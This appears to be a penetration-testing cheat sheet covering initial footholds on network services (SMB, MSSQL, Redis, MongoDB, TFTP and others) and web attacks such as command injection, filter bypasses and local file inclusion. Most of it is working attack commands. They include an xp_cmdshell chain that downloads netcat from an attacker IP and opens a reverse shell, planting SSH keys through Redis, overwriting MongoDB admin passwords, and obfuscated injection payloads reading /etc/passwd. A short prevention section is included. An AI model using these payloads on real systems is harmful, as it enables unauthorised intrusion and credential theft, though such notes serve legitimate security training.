If TFTP is discovered on the target machine, begin my installing TFTP:
```bash
sudo apt install tftp
```

Once installed, or if already installed, start a netcat listener on the local machine, specifying a port number that can be input in a shell. When creating the shell, it is important to remember that the **shell extension depends on the machine and other vulnerabilities on the machine.** For example, if the target machine is Windows, an `exe` shell can be created and placed into the TFTP server. If the target machine has another vulnerability, LFI through a php webserver for example, a `php` shell can be created and placed into the server. After creating the shell, connect to the target via TFTP and put the shell in the remote server:
```bash
1. nc -lvnp <port>

2. tftp <Target IP Address>

3. put <shell>
```

Once the shell is sucessfully placed into the remote TFTP server, find a way to access the shell. The following are the default directories for the TFTP user's home folder:
* `/var/lib/tftpboot`

* `/etc/default/tftpd-hpa`

 The exact exploitation method depends, but if there is a webserver also running on the machine that is vulnerable to LFI, curling the website and including either of the previous directories and adding the name of the shell with the extension (i.e., /var/lib/tftpboot/shell.exe) after the vulnerable paramter may work. If not, find another way to access the shell via Google. 


<a id="snmp"></a>

### **`161/UDP: Simple Network Management Protocol (SNMP)`**


If SNMP is discovered on the target machine during enumeration, it is very important to document specific version information. Proper UDP enumeration should be done before doing this command. The first step to exploit a machine via SNMP is to **query the network:**
* The version (-v) and community string (-c) can be determined through an Nmap scan, using the -sV, -sC, and -sU flags. If the community string is not found, it can be brute forced with **onesixtyone** and a seclist wordlist. Refer to the *Enumerating SNMP* portion for more information.
```bash
snmpwalk -v [1, 2c, 3] -c [Community String] <Target IP Address>
```

<br>

The previous command will yield a list of Object Identifiers (OIDs) and their corresponding values from the target device's SNMP agent. Most importantly, this command will provide the device's make and model. The second step is to **query specific MIBs.** Search for common MIBs to get more information; in some cases, there may be **password MIBs that can uncover passwords in hexadecimal**. If a password MIB is found, do the following command:
```bash
snmpwalk -v [1, 2c, 3] -c [Community String] <Target IP Address> <MIB>
```

<br>

Now, decode the hexadecimal values in Python to get credentials. The following code should yield the corresponding MIB information in ASCII text:
```python
import binascii

s = '<HEX values>'

binascii.unhexlify(s.replace(' ',''))
```

<a id="smb"></a>

### **`445/TCP: Server Message Block (SMB)`**

If SMB is open on the target machine, first determine whether SMB allows guest/anonymous authentication. If the following command yields **ACCESS_DENIED,** then some form of authentication is needed:
```bash
smbclient -L <Target IP>

smbclient -N -L \\\\<Target IP>\\      (no password login)
```

<br>

Exploits for specific SMB versions can be found on metasploit:
```bash
msfconsole> search auxiliary/scanner/smb/    (look through the modules)

msfconsole> search auxiliary/scanner/smb/smb_version (look for individual exploits)
```

<br>

To access SMB shares, try the following command:
```bash
smbclient \\\\<Target IP>\\<Share$>
```
* **`ADMIN$`:** Administrative shares are hidden network shares created by the Windows NT family of OS that allow system administrators to have remote access to every disk volume on a network-connected system. These shares may not be permanently deleted but may be disabled. 
* **`C$`:** Administrative share for the **C:\\** disk volume. This is where the OS is hosted.
* **`IPC$`:** The inter-process communication share. This is used for inter-process communication via named pipes and is not part of the file system. This typically has nothing interesting in it; however, it can be used as a PoC.
   * Any other share is a customer share and should be investigated after the ADMIN$ and C$ share. Again, if NT_STATUS_ACCESS_DENIED is shown, proper credentials are needed to access the share
* If the machine also has a web server running, put a shell directly in a directory that can be accessed through the web. Depending on the server, different extensions can be created for the shell (asp, apx, sh, exe, php, etc)

<br>

If a user's credentials are known and needed, it is possible to log into SMB as a particular user. In poor configurations, one can login as Administrator due to the lack of security measures preventing this. If there is no password for a user account, use psexec to get a fully interactive shell. In fact, all of the **impacket** modules can be used with known credentials on the target machine:
```bash
smbclient \\\\<Target IP>\\<Share$> -U <Username>

smbmap -d <Domain> -u <Username> -p <Password> -H <Target IP>

impacket-psexec.py <username>:'<password>'@<Target IP>

impacket-smbexec.py <username>:'<password>'@<Target IP>

impacket-wmiexec.py <username>:'<password>'@<Target IP>
```

<br>

Once authenticated to the machine via SMB, get all of the files from every directory. The following command gets all of the files from the share:
```bash
RECURSE ON, PROMPT OFF, mget *
```

<a id="rsync"></a>

### **`873/TCP: rsync`**

This is an open source utility that provides fast incremental file transfer. Rsync chooses when there is a need to synchronize files between a computer, storage drive, and across networked computers. Because of the flexibility and speed it offers, it's a standard Linux utility and is included in most distros by default.

If rsync is misconfigured, it may be possible to list files. The first command outputs directories (on the left) and descriptions (on the right). The second command only lists files in a specified share:
```bash
rsync --list-only <Target IP>::

rsync --list-only <Target IP>::<Share>
```

To download the files in a share to the local device, the following command can be specified:
```bash
rsync <Target IP>::<Share>/<File> [New File Name]
```

<a id="ms_sql_s"></a>

### **`1433/TCP: Microsoft SQL (ms-sql-s)`**

Initial footholds via ms sql **require credentials** for a sql account on the machine. The following command can be used to login with impacket; the flag specifies Windows authentication:
```bash
python3 mssqlclient.py <UserID>@<Target IP> -windows-auth
```
* The User ID is typically a domain or username

<br>

Once authenticated onto the account, view the user privileges to determine how to proceed. The following command shows whether the current user is a sysadmin member:
```bash
SQL> SELECT is_srvrolemember('sysadmin');
```
* If "1" is returned, this means that the current user is a **sysadmin** member. If "0" is returned, the current user is **NOT** a sysadmin member. 

<br>

If the user is a sysadmin member, the following exploit can be performed. The first command determined whether xp_cmdshell is activated or not; if it is, skip steps #2-6. If it is not active, the first command will return an error:
```bash
1. SQL> EXEC xp_cmdshell 'net user';

[2.] SQL> EXEC sp_configure 'show advanced options', 1;

[3.] SQL> RECONFIGURE;

[4.] SQL> sp_configure;

[5.] SQL> EXEC sp_configure 'xp_cmdshell', 1;

[6.] SQL> RECONFIGURE;
```

<br>

Now that the exploit is set up, command execution should work. Before trying to get a stable reverse shell, confirm that powershell can be used on the target machine. *Note that "whoami" can be changed to a specific command:*
```bash
SQL> xp_cmdshell "whoami"

SQL> xp_cmdshell "powershell -c pwd"
```

<br>

To get a stable reverse shell, first start a python server on the local machine in a directory that contains **NC.exe** and a local netcat listener.
```bash
python3 -m http.server 80

nc -lvnp <Port>
```

On the target machine, find a directory that allows write and execute privileges. Typically, the **C:\Users\<User>\Downloads** directory has rx permissions. After performing this command, the reverse shell should now be on the local netcat. 
```bash
1. SQL> xp_cmdshell "powershell -c cd C:\Users\<User>\Downloads; wget http://<Attacking IP>/nc64.exe -outfile nc64.exe"

2. SQL> xp_cmdshell "powershell -c cd C:\Users\<User>\Downloadsl .\nc64.exe -e cmd.exe <Attacking IP> <NC Port>"
```

<a id="mysql"></a>

### **`3306/TCP: MySQL`**

MySQL is designed for database management: creating, modifying, and updating databases, changing and adding data, and more. MySQL clients usually authenticate to the service with a username and password combination, but it is essential to test for passwordless authentication. 

Before trying to exploit, ensure that SQL is installed on the local machine:
```bash
sudo apt update && sudo apt install mysql*
```

<br>

Try logging in as root to have the highest level of privileges on the system. If this doesn't work, then user credentials are required to access the DBMS. This can be brute forced or enumerated:
```bash
mysql -h <Target IP> -u <Username>
```

<br>

Enumerate the DB and gather user credentials to access tha machine as a [non]privileged user:
```bash
1. MariaDB [(none)]> SHOW databases;

2. MariaDB [(none)]> USE <DB Name>;

3. MariaDB [(none)]> SHOW tables;

4. MariaDB [(none)]> SELECT * FROM <Table>;
```

<a id="msterminalservices"></a>

### **`3389/TCP: Microsoft Terminal Services`**

Before accessing MS terminal services, **xfreerdp** must be installed on the attacking machine:
```bash
sudo apt-get install freerdp2-x11
```

<br>

The following command specifies the traget IP using the host machine;s login information as a guest. This essentially tests guest login capabilities. *Do NOT specify a password, just hit enter:*
```bash
xfreerdp /v:<Target IP>
```

<br>

The following command ignores all security certificate usage and specifies a default account on the machine. This essentially bypasses the security certificate. If this port is open on a machine, it is clearly a Windows device, so default accounts would be user, admin, Administrator. Again, do not specify a password, just hit enter. If this command is successful, a remote Windows GUI will open:
```bash
xfreerdp /v:<Target IP> /cert:ignore /u:Administrator
```

<a id="redis"></a>

### **`6379/TCP: Remote Dictionary Server (Redis)`**

Redis is an open source advanced NoSQL key-value data store used as a database, cash, and message broker. The data is stored in a dictionary format having key-value pairs, and is typically used for short term storage of data that needs fast retrieval. The database is stored in the server's RAM to enable fast data access; also writes the contents of the database to the disk at varying intervals to persist it as a backup in case of a failure. 

Install the Redis CLI and connect to the Redis Server. The Redis server can also be connected to via netcat, but the following installation is a dedicated application to connect and enumerate Redis. If the login is successful, there will be a terminal prompt with the target IP and port number:
```bash
sudo apt install redis-tools

redis-cli -h <Target IP>
```

<br>

Once connected, Redis can be enumerated. First, look for information under **#Keyspace.** This section provides statistics on the main dictionary of each database, including the number of keys and the number of keys with an expiration. Look at the database number for the step #2, and only input the number next to the database (this is the index corresponding to the database). After this is done, step #3 lists all of the keys present in the selected database, and step #4 gets the values of said keys:
```bash
1. x.x.x.x:6379> info

2. x.x.x.x:6379> select <number>

3. x.x.x.x:6379> keys *

4. x.x.x.x:6379> get <key>
```

<br>

If there is no information for **#Keyspace,** proceed with the following command to see if the redis user has SSH authentication configured. Step #2 shows the default redis folder: this is typically **var/lib/redis,** but it is important to confirm what it is because the proceeding commands depend on the default folder. If there is a different redis folder, change the directory path to the configured folder. If the `.ssh` folder exists, the output will be "OK:"
```bash
1. x.x.x.x:6379> CONFIG GET *

2. x.x.x.x:6379> CONFIG GET dir

3. x.x.x.x:6379> CONFIG SET dir /var/lib/redis/,ssh
```

<br>

Once the existence of the `.ssh` folder is confirmed, the attacker must create a file with their public key (key.txt). If there isn't one already, create an ssh key pair before executing this command:
```bash
ssh-keygen -i rsa    [optional command if no key pair is on the attacker's machine]
```
```bash
echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n" > key.txt
```

Now, on the attacking machine, set the public SSH key as a key in redis and exploit the redis service
```bash
cat key.txt | redis-cli -h <Target IP> -x set ssh_key

redis-cli -h <Target IP>

x.x.x.x:6379> GET ssh_key
x.x.x.x:6379> CONFIG SET dir /var/lib/redis/.ssh
x.x.x.x:6379> CONFIG SET <dbfilename> authorized_keys
x.x.x.x:6379> save
x.x.x.x:6379> exit
```

Now, the attacker should be able to connect to the machine as the redis service via ssh. If this doesn't work, the attacker's private key might have to be used to prove authenticity:
* `ssh -i /root/.ssh/id_rsa redis@<Target IP>`

<a id="mongodb"></a>

### **`27017/TCP: MongoDB`**

MongoDB is a documented-oriented NoSQL database. Instead of using tables and rows, MongoDB makes use of collections and documents. Each database contains collections, which in turn, contain documents. Each document consists of key-value pairs, which are the basic unit of data in MongoDB. A single collection can contain multiple documents, which are schemaless, meaning that the size and content of each document can be different from each other. 

Install and connect to the MongoDB server; if the MongoDB server is poorly configured, the following command will allow anonymous login:
```bash
1. curl -O https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-3.4.7.tgz 

2. tar xvf mongodb-linux-x86-3.4.7.tgz

3. cd mongodb-linux-x86-3.4.7/bin

4. ./mongo mongodb://<Target IP>:27017
```

<br>

Enumerate the MongoDB Server:
```bash
> show dbs;

> use <database>;

> show collections;

> db.[collection].find().pretty();

ps aux | grep mongo  
```
* If MongoDB is running on the final command (also on 27117/TCP), proceed to the following exploit. 

<br>

The following commands exploit an internal MongoDB connection. First, the username and passwords (x_shadow) are extracted. It is important to look at the identifier **$[numbers]$** to determine the hashing algorithm used for the x_shadow filed. If the password cannot be cracked, create a hash to replace the password. Searh the identifier on Google to determine which algorithm was used. Also, remember the **x_shadow** and **__id** fields. The final step sets a new admin password via MongoDB:
```bash
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"

mkpasswd -m <Hashing Algorithm> <Password>

mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("[Input Value]")},{$set:{"x_shadow":"<New Password>"}})'
```

** *

<a id="webinitialfootholds"></a>

## **Initial Footholds (Web)**

<a id="commandinjections"></a>

### **`Command Injections`**

A **`Command Injection`** vulnerability allows attackers to execute system commands directly on the back-end hosting server, which could lead to compromising the entire network. If a web app uses user-controlled input to execute a system command on the back-end server to retrieve and return specific output, attackers may be able to inject a malicious payload to subvert the intended command and execute the attacker's command. The following are some of the most common types of injections:

* **`OS Command Injection`:** Occurs when user input is directly used as part of an OS command

* **`Code Injection`:** Occurs when user input is directly within a function that evaulates code

* **`SQL Injections`:** Occurs when user input is directly used as part of a SQL query

* **`Cross-Site Scripting/HTML Injection`:** Occurs when exact user input is displayed on a web page

Whenever user input is used within a query without being properly sanitized, it may be possible to escape the boundaries of the user input string to the parent query and manipulate it to change its intended purpose. When it comes to OS Command injections, the controlled user input must directly or indirectly go into a web query that executes system commands. All web programming languages have different function that enable the develop to execute OS commands directly on the back-end server whenever they need to. This may be used for various purposes, like installing plugins or executing certain applications. 

Command injection vulnerabilities are not unique to web apps but can also affect other binaries and thick clients if they pass unsanitized user input to a function that executes system commands, which can also be exploited with the following command injection methods.

<a id="cmdinjdetection"></a>

#### **`Detection`**

The process of detecting basic OS command injection vulnerabilities is the same process for exploiting them. If the command output changes from the intended usual result, then the vulnerability has been successfully exploited. For more advanced command injection vulnerabilities, various fuzzing method or code reviews to identify potential command injection vulnerabilities can be used. The following, however, focuses on basic command injections.

To inject an additional command to the intended one, the following operators may be used:

<center>

|Injection Character|URL-Encoded Character|Executed Command|
|-------------------|---------------------|----------------|
|`;`|`%3b`|Both|
|`\n`|`%0a`|Both|
|`&`|`%26`|Both (second output generally shown first)|
|`\|`|`%7c`|Both (only second output is shown)|
|`&&`|`%26%26`|Both (only if first succeeds)|
|`\|\|`|`%7c%7c`|Second (only if first fails)|
|``|`%60%60`|Both (Linux-only)|
|`$()`|`%24%28%29`|Both (Linux-only)|

</center>

> The last two are sub-shells for Linux; the injected command would be wrapped with these operators

Any of the previous operators can be used to inject another command so both or either of the commands get executed. The expected input would be written, then any of the above operators followed by the new command. In general, for basic command injection, all of these operators can be used for command injections regardless of the web app language, framework, or back-end server. 

<a id="cmdinjbypassingfevalid"></a>

#### **`Bypassing Front-End Validation`**

It is common for developers to only perform input validation on the front-end while not validating or sanitizing the input on the back-end. However, front-end validations are usually not enough to prevent injections, as they can be easily bypassed by sending customer HTTP requests directly to the back-end. 

The easiest method to customize the HTTP requests being sent to the back-end server is to use a web proxy that can intercept the HTTP request being sent by the application. This can be done via Burp to proxy the traffic through them. 
1. Capture request
2. Customize HTTP request to include command injection. The payload should be URL-encoded to ensure that it gets sent.

<a id="cmdinjidentfilters"></a>

#### **`Identifying Filters`**

Another type of injection mitigation is using blacklisted characters and words on the back-end to detect injection attempts and deny the request if any request contained them. Another layer is using WAFs, which may have a broader scope and various methods of injection detection and prevent other attacks, like SQLi or XSS. The following provides examples of how command injections may be detected and blocked, and how attackers can identify what is being blocked. 


If the command injection yields an error message, then something was sent that triggered a security mechanism in place that denied the request. If the error message is is shown where the output is displayed, then it was prevented by the PHP web app itself. **If the error message displayed a different page, with information like the attacker's IP and the request, this may indicate that it was denied by a `WAF`**. 

A web app may have a list of blacklisted characters, and if the command contains them, it would deny the request. If the web app was written in PHP, the code may look like:
```php
$blacklist = ['&', '|', ';', ...SNIP...];
foreach ($blacklist as $character) {
    if (strpos($_POST['ip'], $character) !== false) {
        echo "Invalid input";
    }
}
```
Before attempting to bypass the **`filter`**, try to identify which character or command caused the denied request. Once identified, try using all of the other command injection operators. 

<a id="cmdinjbypasspacefilters"></a>

#### **`Bypassing Space Filters`**

The **new-line (`\n`)** character is not usually blacklisted, as it may be needed in the payload itself, so it should also be attempted. This injection operator works in appending commands, both in Linux and Windows. 

Besides this, a **space character is often blacklisted and is crucial to some command injection attacks;** however, it can be bypassed in many cases. 

Using **`tabs` (`%09`) instead of spaces is a technique that may work,** as both Linux and Windows accept commands with tabs between arguments, and they are executed the same. 
```bash
ip=127.0.0.1%0a%09whoami
```

The Linux Environment Variable, **(`$IFS`)** may also work since its default value is a space and a tab, which would work between command arguments. If `${IFS}` is placed where the spaces should be, the variable should automatically replace the space and the command should work.
```bash
ip=127.0.0.1%0a${IFS}whoami
```

Finally, the **`Bash Brace Expansion`** feature can be used in lieu of spaces. This automatically adds spaces between arguments wrapped between braces:
```bash
ip=127.0.0.1%0a{ls,-la}
```

<a id="cmdinjbypassothblkchar"></a>

#### **`Bypassing Other Blacklisted Characters`**

Besides injection operators and space characters, both slashes are often blacklisted. There are several techniques to produce any character desired while avoiding the use of blacklisted characters. 

**<u>Linux</u>**

One technique for replacing slashes (or any other character) is through **`Linux Environment Variables`.** While `${IFS}` is directly replaced with a space, there's no environment variable for slashes or semi-colons; however, these characters may be used in an environment variable. The start and length of the string can be specified to exactly match this character. For example, the $PATH environment variable in linux can be used. First, look at what it would output:
```bash
echo ${PATH}

> /usr/local/bin:/usr/bin:/bin:/usr/games
```
* If starting at the 0 character, and only taking a string of length 1, the `/` will be taken. 
  * The `${PATH}` environment variable can be used in payloads to specify certain characters:
```bash
echo ${PATH:0:1}

> /
```

The same can be done with the `$HOME` or `$PWD` environment variables too. This same concept can be done to get the semi-colon character:
```bash
echo ${LS_COLORS:10:1}

> ;
```

> These environment variables can be combined in a payload to bypass a filter

<br>


**<u>Windows</u>**

To produce a slash in Windows Command Line (CMD), a Windows variable can be echoed (`%HOMEPATH%`), specify a starting position (`~6`), and specify a negative end position (`-11`). Of course, first type %HOMEPATH% in PowerShell to see the entire string to determine the starting and end position:
```powershell
echo %HOMEPATH:~6,-11%

> \
```

With PowerShell, because a word is considered an array, the index of the needed character can be specified. If only one character is needed, there is no need to specify the start and end positions:
```powershell
$env:HOMEPATH[0]

> \
```

<br>

**<u>Character Shifting</u>**

There are other techniques to produce the required characters without using them, like shifting characters. For example, the following Linux command shifts characters by 1. So, find the character in the ASCII table that is just before the needed character, then add it instead of `[` in the below example. This way, the last printed character would be the one required:
```bash
man ascii     # \ is on 92, before it is [ on 91

echo $(tr '!-}' '"-~'<<<[)

> \
```

<a id="cmdinjbypassblkcmds"></a>

#### **`Bypassing Blacklisted Commands`**

A command blacklist usually consists of a set of words, and if these commands can be obfuscated to make them look different, it may be possible to bypass the filters. The following are a few basic techniques that may enable attackers to change the look of the command to bypass filters manually.

**<u>Linux & Windows</u>**

A common and easy obfuscation technique is **inserting certain characters within the command that are usually ignored by command shells** like Bash and PowerShell, and will execute the same command as if they were not there. The easiest to use are quotes, and they work on both Linux and Windows servers:
```bash
w'h'o'am'i

w"h"o"am"i
```

> Attackers are unable to mix types of quotes and the number of quotes must be even. Of course, the other filters, once URL encoded, can also be combined with these command bypass techniques

<br>

**<u>Linux Only</u>**

There are Linux-only characters that can be input in the middle of commands; the Bash shell would ignore them and execute the command. These characters include the **backslash `\`** and the **positional parameter character `$@`.** This works as it did with the quotes, but the number of characters do not have to be even:
```bash

who$@ami

w\ho\am\i
```

<br>

**<u>Windows Only</u>**

There are Windows-only characters that can be inserted in the middle of commands that do not affect the outcome, like a **caret `^`** 
```powershell
who^ami
```

<a id="cmdinjadvcmdobfus"></a>

#### **`Advanced Command Obfuscation`**

**<u>Case Manipulation</u>**

**Case Manipulation** inverts the character cases of a command or alternates between cases. This usually works because a command blacklist may not check for different case variations of a single word.

If dealing with a Windows server, the casing of the characters of the command can be changed and sent. In Windows, commands for PowerShell and CMD are case-insensitive, meaning they will execute the command regardless of what case it is written in:
```powershell
WhOaMi
```

Because Linux is case-sensitive, case-manipulation will not work. The following turns the command into an all-lowercase word.  The following can be used:
```bash
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
```
* This command uses `tr` to replace all upper-case characters with lower-case characters, which results in an all lower-case character command. 

If the web app filters spaces, this command will get blocked, however. Replace the spaces with tabs `%09` before inputting it through Burp:
```bash
ip=127.0.0.1%0a(tr%09"[A-Z]"%09"[a-z]"<<<"WhOaMi")
```

The following is another technique that does the same:
```bash
$(a="WhOaMi";printf %s "${a,,}")
```
> Remember to bypass the blacklisted characters 

<br>

**<u>Reversed Commands</u>**

**Reversed Commands** include having a command template that switches the commands back and executes them in real-time. This includes creating Linux/Windows commands that eventually execute the command without containing the actual command words:
```bash
echo 'whoami' | rev
```

After getting the output (imaohw), the original command can be executed by **reversing it back in a sub-shell `($())`:**
```bash
$(rev<<<'imaohw')
```

For **Windows,** a string can be reversed as follows:
```powershell
 "whoami"[-1..-20] -join ''
```

After getting the output (imaohw), the reverse string can be **executed with a Powershell sub-shell `(iex "$()")`:**
```powershell
iex "$('imaohw'[-1..-20] -join '')"
```

<br>

**<u>Encoded Commands</u>**

Using **Encoded Commands** makes it less likely to be denied by a filter or a WAF. The created command will be unique to each case, depending on what characters are allowed and the level of security on the filter. `Base64` or `xxd` (for hex encoding) can be used. 

**1. Encode the payload that should be executed; including filtered characters:**
```bash
echo -n 'cat /etc/passwd | grep 33' | base64
```

**2. Create a comand that will decode the encoded string in a sub-shell `($())`, and then pass it to bash to be executed (`bash<<<`):**
```bash
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
```

> `<<<` is used instead of pipe `|`, as it is often a filtered character


**3. Replace the spaces to execute the same command through command injection**
```bash
ip=127.0.0.1%0abash<<<$(base64%09-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
```

> Even if some commands were filtered, like bash or base64, the filter could be bypassed by using the aforementioned techniques, or other alternatives can be used, like sh for command execution and openssl for b64 decoding, or xxd for hex decoding

<br>

The same techniques can be done with Windows:

**1. Use base64 to encode the string**
```powershell
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
```

On a side note, the same can be done on Linux, but the string would have to be converted from UTF-8 to UTF-16 before it is base64'd:
```bash
echo -n whoami | iconv -f utf-8 -t utf-16le | base64
```

**2. Deocde the b64 string and execute it with a PS sub-shell `(iex "$()")`:**
```powershell
iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
```

Other techniques can be found on [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#bypass-with-variable-expansion)
* Also, look for automated obfuscation tools
  * **Linux:** `Bashfuscator`
  * **Windows:** `DOSfuscation`

<a id="cmdinjprev"></a>

#### **`Command Injection Prevention`**

**<u>System Commands</u>**

Avoid using functions that execute system commands, especially if there is user input. Even when not directly inputting user input into these functions, a user may be able to indirectly influence them, which may eventually lead to a command injection vulnerability.

Instead of using system command execution functions, **built-in functions that perform the needed functionality** should be used, as back-end languages usually have secure implementations of these types of functions. 
* If no built-in function is found to perform a functionality, never directly use the user input with these functions, but always validate and sanitize the user input on the back-end
* Limit the use of these types of functions, only using them when there's no built-in alternative to the required functionality.

<br>

**<u>Input Validation</u>**

Whether using built-in function or system command execution functions, always **validate and then sanitize the user input.** Input validation is done to ensure it matches the expected format for the input, such that the request is denied if it does not match. This should be done both on the front- and back-end. 


In PHP, like many other web development languages, there are built-in filters for a variety of standard formats, like emails, URLs, and even IPs, which can be sued with the `filter_var` function:
```php
if (filter_var($_GET['ip'], FILTER_VALIDATE_IP)) {
    // call function
} else {
    // deny request
}
```

If validating a different non-standard format, then `regex` with the `preg_match` function should be used. 

<br>

**<u>Input Sanitization</u>**

The most critical part for preventing any injection vulnerability is **input sanitization,** which means removing any non0necessary special characters from the user input. Input sanitization is always performed after input validation. Even after the provided user input is validated to be in the proper format, sanitization should be performed to remove any special characters that are not required for the specific format, as there are cases where input validation may fail (i.e., bad regex).

Blacklisting certain words is generally not enough to prevent injections; built-in functions should be used to remove any special characters. In PHP, the `preg_replace` function can be used to remove any special characters from the user input:
```php
$ip = preg_replace('/[^A-Za-z0-9.]/', '', $_GET['ip']);
```
* In this case, regex only allows alphanumerical characters (A-Za-z0-9) and allows a dot character as required for IPs. Any other character will be removed from the string. 

The same can be done with JS:
```js
var ip = ip.replace(/[^A-Za-z0-9.]/g, '');
```

The DOMPurify library for a NodeJS back-end can also be used:
```js
import DOMPurify from 'dompurify';
var ip = DOMPurify.sanitize(ip);
```

In certain cases, all special characters may be allowed. In PHP, The `filter_var` function should be used for input validation, and the `escapeshellcmd` filter can be used to escape any special characters so that they cannot be cause any injections. For NodeJS, the `escape(ip)` function can be used; however, escaping special characters is not considered a secure practice, as it may be bypassed through various techniques. 

<br>

**<u>Server Configuration</u>**

The back-end server should be securely configured to reduce the impact in the event of a webserver being compromised. Some of the configurations that may be implemented include:

* Use the web server's built-in WAF (i.e., Apache mod_security) in addition to an external WAF

* Abide by the **Principle of Lease Privilege** by running the web server as a low privileged user (www-data)

* Prevent certain functions from being executed by the web server

* Limit the scope accessible by the web application to its folder

* Reject double-encoded request and non-ASCII characters in URLs

* Avoid the use of sensitive/outdated libraries and modules

<a id="fileinclusion"></a>

### **`File Inclusion`**

Modern back-end languages, like PHP, JS, or Java, use HTTP parameters to specify what is shown on the web page. These HTTP parameters allow for building dynamic web pages, reducing overall script sizes, and simplifies code. In such cases, parameters are used to specify which resource is shown on the page. If such functionalities are not securely coded, an attacker may manipulate these parameters to display the content of any local file on the hosting server, leading to a **`Local File Inclusion (LFI)`.** 


The most common place to find LFI is within **templating engines.** In order to have most of the web application looking the same when navigating between pages, a templating engine displays a page that shows the common static parts, such as the header, navigation bar, and footer, and then dynamically loads other content that changes between pages. Otherwise, every page on the server would need to be modified when changes are made to any part of the static parts. 
* This is why there are parameters like `/index.php?page=about`, where *index.php* sets static content (header/footer), and then only pulls the dynamic content specified in the parameter, which in this case may be read from a file called *about.php*.
   * If there is control over the *about* portion of the request, it may be possible to have the web application grab other files and display them on the page

<br>

LFI vulnerabilities can lead to **source code disclosure, sensitive data exposure, and even RCE** under certain conditions. Leaking source code may allow attackers to test the code for other vulnerabilities, which may reveal previously unknown vulnerabilities. Furthermore, leaking sensitive data may enable attackers to enumerate the remote server for other weaknesses or even leak credentials and keys that may allow them to access the remote server directly. Under specific conditions, LFI may also allow attackers to execute code on the remote server, which may compromise the entire back-end server and any other servers connected to it. While each of the most popular web servers and development frameworks have a different approach to including local files, they all load a file from a specified path:
* Such a file could could be a dynamic header or different content based on the user-specified language
   * For example, the page may have a `?language GET` parameter, and if a user changes the language from a drop-down menu, then the same page would be returned but with a different language parameter (i.e., ?language=es). In such cases, changing the language may change the directory the web application is loading the pages from (i.e., /en/ or es/). If there is control over the path being loaded, then there may be a vulnerability to read other files and potentially reach RCE

<a id="localfileinclusion"></a>

#### **`Local File Inclusion`**

**<u>Basic LFI</u>**

If the web application is pulling a file that is being included in the page, a hacker may be able to change the file being pulled to read the content of a different local file. Two common readable files that are available on most back-end servers are:

1. **Linux: `/etc/passwd`**
2. **Windows: `C:\Windows\boot.ini`**

Because of this, depending on the server architecture, the parameter of a website hosted on Linux server can be changed to:
```bash
index.php?language=/etc/passwd
```
* If the page is vulnerable, it may be possible to read the content of the passwd file and identify what users exist on the back-end server


This example reads a file by specifying its absolute path. This would work if the whole input was used within the `include()` function without any additions, like the following example:
```php
include($_GET['language']);
```
* In this case, if the /etc/passwd file is trying to be read, then the `include()` function would fetch that file directly. This is not so common and obviously insecure, so, path traversal may need to be done. 

<br>


**<u>Path Traversal</u>**

In many occasions, web develops may append or prepend a string to the parameter. For example, the language parameter may be used for the filename, and may be added after a directory, as follows:
```php
include("./languages/" . $_GET['language']);
```
* In this case, if a hacker attempts to read /etc/passwd, then the path passed to `include()` would be `/languages//etc/passwd`, and as this file does not exist, reading the file's contents will not be possible. 

This restriction can be bypassed by **traversing directories using relative paths.** To do so, `../` can be added before a file name, which refers to the parent directory:
```bash
index.php?language=../../../../etc/passwd
```
* For example, if the full path of the languages directory is /var/www/html/languages/, then using ../index.php would refer to the index.php file on the parent directory (i.e., /var/www/html/index.php).

* This can be done to go back several directories until reaching the root path (i.e., `/`), and then specifying an absolute file path (i.e., `../../../../etc/passwd`), and the file should exist. 
   * This would even work if the entire parameter was used in the `include()` function, so this technique can be used from the beginning. If a user is not sure of the directory the web application is in, `../` can be added many times without breaking the path. However, it can always be useful and efficient to not add `../` several times, especially when writing a report or writing an exploit. 
   
<br>

**<u>Filename Prefix</u>**

On some occasions, the input may be appended after a different string. For example, it may be used with a prefix to get the full filname, like the following example:
```php
include("lang_" . $_GET['language']);
```
* In this case, if trying to traverse the directory with `../../../etc/passwd`, the final string would be `lang_../../../etc/passwd`, which is invalid. 

Instead of directly using path traversal, `/` can be prefixed before the payload, which would consider the prefix as a directory. Doing so would allow a hacker to bypass the filename and traverse directories:
```bash
index.php?language=/../../../etc/passwd
```

> This may not always work. Also, any prefix appended to the input may break some file inclusion techniques, like PHP wrappers and filters or RFI

<br>

**<u>Appended Extensions</u>**

Another example is when an extension is appended to the language parameter:
```php
include($_GET['language'] . ".php");
```

This is common in many web applications. This may also be safer as it may restrict users to only including PHP files. In this case, if trying to read /etc/passwd, then the file included would be /etc/passwd.php, which does not exist. Other methods may be able to bypass this, however. 

<br>

**<u>Second-Order Attacks</u>**

Second Order attacks are a more advanced LFI attack. This occurs because many web application functionalities may be insecurely pulling files from the back-end server based on user-controlled parameters. 

For example, a web application may allow users to download an avatar through a URL like (/profile/$username/avatar.png). If trying to craft a malicious LFI username, like `../../../etc/passwd`, then it may be possible to change the file being pulled to another local file on the server and grab it instead of an avatar.
* This is technically poisoning a database entry with a malicious LFI payload in the username. Then, another web application functionality would utilize this poisoned entry to perform the attack (i.e. download our avatar based on username value).

These vulnerabilities are often overlooked, as they may protect against direct user input, but they may trust values from their database. If it is possible to poison a username during registration, then this attack would be possible. 
* Performing this attack requires spotting a function that pulls a file based on a value that can be indirectly controlled, and then trying to control that value to exploit the vulnerability

<a id="basicbypassesfiledisc"></a>

#### **`Basic Bypasses`**

**<u>Non-Recursive Path Traversal Filters</u>**

One of the most basic filters against LFI is a search and replace filter, where it deletes substrings of (../) to avoid path traversals. For example:
```php
$language = str_replace('../', '', $_GET['language']);
```

This filter is quite insecure, as it is not recursively removing the ../ substring, as it runs a single time on the input string and does not apply the filter on the output string. For example, if `....//` is used as a payload, then the filter would remove the ../ and the output string would be ../, which means that path traversal can still be performed:
```bash
index.php?language=....//....//....//....//etc/passwd
```

